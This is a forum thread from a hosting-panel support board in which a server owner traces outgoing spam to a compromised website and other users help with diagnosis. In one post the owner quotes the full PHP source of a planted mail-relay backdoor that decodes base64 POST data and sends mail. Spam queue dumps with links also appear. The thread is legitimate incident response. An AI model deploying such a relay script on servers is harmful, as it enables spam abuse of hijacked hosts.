Website sending SPAM E-Mails

Discussion in 'Installation/Configuration' started by Taxi, Dec 16, 2021.

  1. Taxi

    Taxi Member

    Hello
    my postfix queue gets filled with spam mails. Unfortunately my ISPConfig lets the SPAM through.
    How do I find which e-mail address is compromized or what can I do to fix the problem?
    ISPConfig latest version 3.2.7p1
    PHP 7.4
    Kind regards
    Chistian
     
  2. Taleman

    Taleman Well-Known Member HowtoForge Supporter

    Read the e-mails to see which account is sending them. My signature has link to e-mail setup tutorial with Troubleshooting tips.
    Then change the passwords of that account. Try to figure out how account got compromised and what more needs to be done.
     
  3. Taxi

    Taxi Member

    Many thanks Taleman for your quick answer!
    I found the address is [email protected]. This address even did not exist. Now I added a forward with this address to an existing account. Is my dovecot configuration wrong that it lets mails trough even without an account?
     
  4. till

    till Super Moderator Staff Member ISPConfig Developer

    When you see emails from [email protected] in your mailqueue, then this normally means that one of your websites got hacked, the website domain.com. You can most likely find more details on which script in your hacked website is sending the spam by checking the mail headers of one of the spam emails using postcat command. Get a message ID of one of the mails using:

    postqueue .p

    and then review the headers of it with:

    postcat -q MSGID

    where MSGID needs to be replaced with the message ID of the message you want to view. In the headers, you'll probably find the name of the hacked PHP script that sends the emails.
     
  5. Taxi

    Taxi Member

    Many Thanks Till!
    Unfortunately the domain is the main domain running ISPConfig.
    The headers don't show any hint to a script:
    -- 250 Kbytes in 437 Requests.
    sun:~# postcat -q A63206B82D3D
    *** ENVELOPE RECORDS maildrop/A63206B82D3D ***
    message_arrival_time: Fri Dec 17 09:44:48 2021
    named_attribute: rewrite_context=local
    sender_fullname:
    sender: webmaster @ rothmedia.net
    *** MESSAGE CONTENTS maildrop/A63206B82D3D ***
    To: pdhens @ yahoo.com
    Subject: sup Maya!
    Date: Fri, 17 Dec 2021 10:44:33 +0200
    Message-ID: <[email protected]>
    Return-Path: <[email protected]>
    From: Mariah Ci a lis Soft 20mg de a ler <[email protected]>
    Reply-to: Mariah Ci a lis Soft 20mg de a ler <[email protected]>
    MIME-Version: 1.0
    Content-Type: text/plain; charset=UTF-8
    Content-Transfer-Encoding: 8bit

    works
    http:// mmedc.edu.mm /ivette_furtrell. html
    Maya Sigua
    *** HEADER EXTRACTED maildrop/A63206B82D3D ***
    recipient: pdhens @ yahoo.com
    *** MESSAGE FILE END maildrop/A63206B82D3D ***
    sun:~# postcat -q 469E96B82D47
    *** ENVELOPE RECORDS maildrop/469E96B82D47 ***
    message_arrival_time: Fri Dec 17 09:44:51 2021
    named_attribute: rewrite_context=local
    sender_fullname:
    sender: webmaster @ rothmedia.net
    *** MESSAGE CONTENTS maildrop/469E96B82D47 ***
    To: captdivine @ aol. com
    Subject: hiya Dani!
    Date: Fri, 17 Dec 2021 10:44:36 +0200
    Message-ID: <5457b159d519cdcf30f09b17ade23fdd @dot.state. nh.us>
    Return-Path: <21l ynelle @dot.state. nh.us>
    From: Grace Ci a lis 20mg ret a iler <21lynelle @ dot.state.nh. us>
    Reply-to: Grace Ci a lis 20mg ret a iler <21lynelle @ dot.state.nh. us>
    MIME-Version: 1.0
    Content-Type: text/plain; charset=UTF-8
    Content-Transfer-Encoding: 8bit

    mill
    http:// sandhu.codebucketitsolutions. com/shirlee_ knoeringer. html
    Dani Heede
    *** HEADER EXTRACTED maildrop/469E96B82D47 ***
    recipient: capt divine @aol. com
    *** MESSAGE FILE END maildrop/469E96B82D47 ***
     
    Last edited by a moderator: Dec 17, 2021
  6. Taleman

    Taleman Well-Known Member HowtoForge Supporter

  7. Jesse Norell

    Jesse Norell ISPConfig Developer Staff Member ISPConfig Developer

    Search your mail logs for the same message I'd you see in the mail queue and you might get some more clues, eg. maybe the local user which submitted the message. You might be able to correlate the time messages are sent with a cron jobs or with website requests via logs (and be sure to manually check all cron jobs).
     
  8. Taxi

    Taxi Member

    At the moment I let Postfix run from time to time and start it manually after deleting all messages with the sender webmaster @ rothmedia.net in the queue.
    I'm doing this with the following command:
    postqueue -p | tail -n +2 | awk 'BEGIN { RS = "" } /[email protected]\.net/ {print $1 }' | tr -d '*!' | sudo postsuper -d -
    I get a lot of "Undelivered Mail Returned to Sender" messages, because of the deleted messages. Looking into them I can't identify any X-PHP-Originating-Script.
    Also when looking at the messages with postcat -q <msg-ID>
    The cron jobs from the root user are looking okay, no additional cron job who is sending mails.
    Looking into /var/www/rothmedia.net/web/ I have found many .php files e.g. yNKLFEsn.php
    The content of each file is:
    <?php

    foreach($_POST as $key => $x_value) {

    $data = base64_decode($x_value) ;
    $to_data = explode('|', $data);

    $to = $to_data[0];
    $x_subject = $to_data[1];
    $x_body = $to_data[2];
    $from_user = $to_data[3];
    $from_email = $to_data[4];
    $header = $to_data[5];

    $jfnbrsjfq = mail($to, $x_subject, $x_body, $header);
    if($jfnbrsjfq){echo 'error 403';} else {echo 'error 404 : ' . $jfnbrsjfq;}

    exit;
    }
    echo '###ERROR 404';


    There is also a wp-admin folder with lot of .txt files e.g. 'ZXZlbnRzLnJvdGhtZWRpYS5uZXQ=.txt'. The content is the same in each file:
    LmZ1cm5pdHVyZWVuZ2luZWVyaW5nLnh5eg==|MTAwMC5mdXJuaXR1cmVlbmdpbmVlcmluZy54eXo=

    I think this are my scripts sending the mails.
    My question now. How comes that there is a wp-admin folder?
    Does ISPConfig need a wordpress installation in its web root?
    Can I delete everything under the web folder exept the folders stats, error and assets?
     
  9. Taxi

    Taxi Member

    It seems that s.o. has installed a whole wordpress onto my server.
    I checked the wp-config.php and the database is a server IP somewhere.
    I could try to log into this db on that remote host and delete it. :)
    Well my question now is, how could s.o. gain access to my sever and install a wordpress instance?

    Even the domain rothmedia.net is redirected to another domain. I guess that with the deletion of the wordpress stuff in a few hours also this redirection is deleted.

    What is wondering me is the matter that in the web directory there is a directory called .
    And it is not the one . and .. which are listed via ls -l.
    No, it shows up with the dot like marked in a green block. Its permissions are drwxrwxrwx.
    I can't access it.
     
    Last edited: Dec 18, 2021
  10. Taleman

    Taleman Well-Known Member HowtoForge Supporter

    If root can not access it, check with command lsattr if it is protected with file attributes. Man pages lsattr and chattr explain more.
    You need to find answer to that question to prevent this happening again. Changing all passwords related to that website is one thing you should do. Examine file time stamps, what is the oldest on these files installed by cracker? Then examine all log files at that time.
    What about cron jobs of other users? Those php files you found are mail sending scripts, but they must be started somehow. Wordpress and other CMS tend to have security issues unless updated to latest version. Maybe cracker just installed Wordpress and cracks into your system repeatedly through worpdress to install one of those files and starts the script? Check logs to maybe see these happening.
    Try what happens with
    Code:
    echo "LmZ1cm5pdHVyZWVuZ2luZWVyaW5nLnh5eg==" | base64 --decode
    Where did this redirection happen? If in .htaccess file, unless that .htaccess is removed or repaired redirection continues.
     
  11. Jesse Norell

    Jesse Norell ISPConfig Developer Staff Member ISPConfig Developer

    It probably has one or more space characters in the name, like '. '
     

Share This Page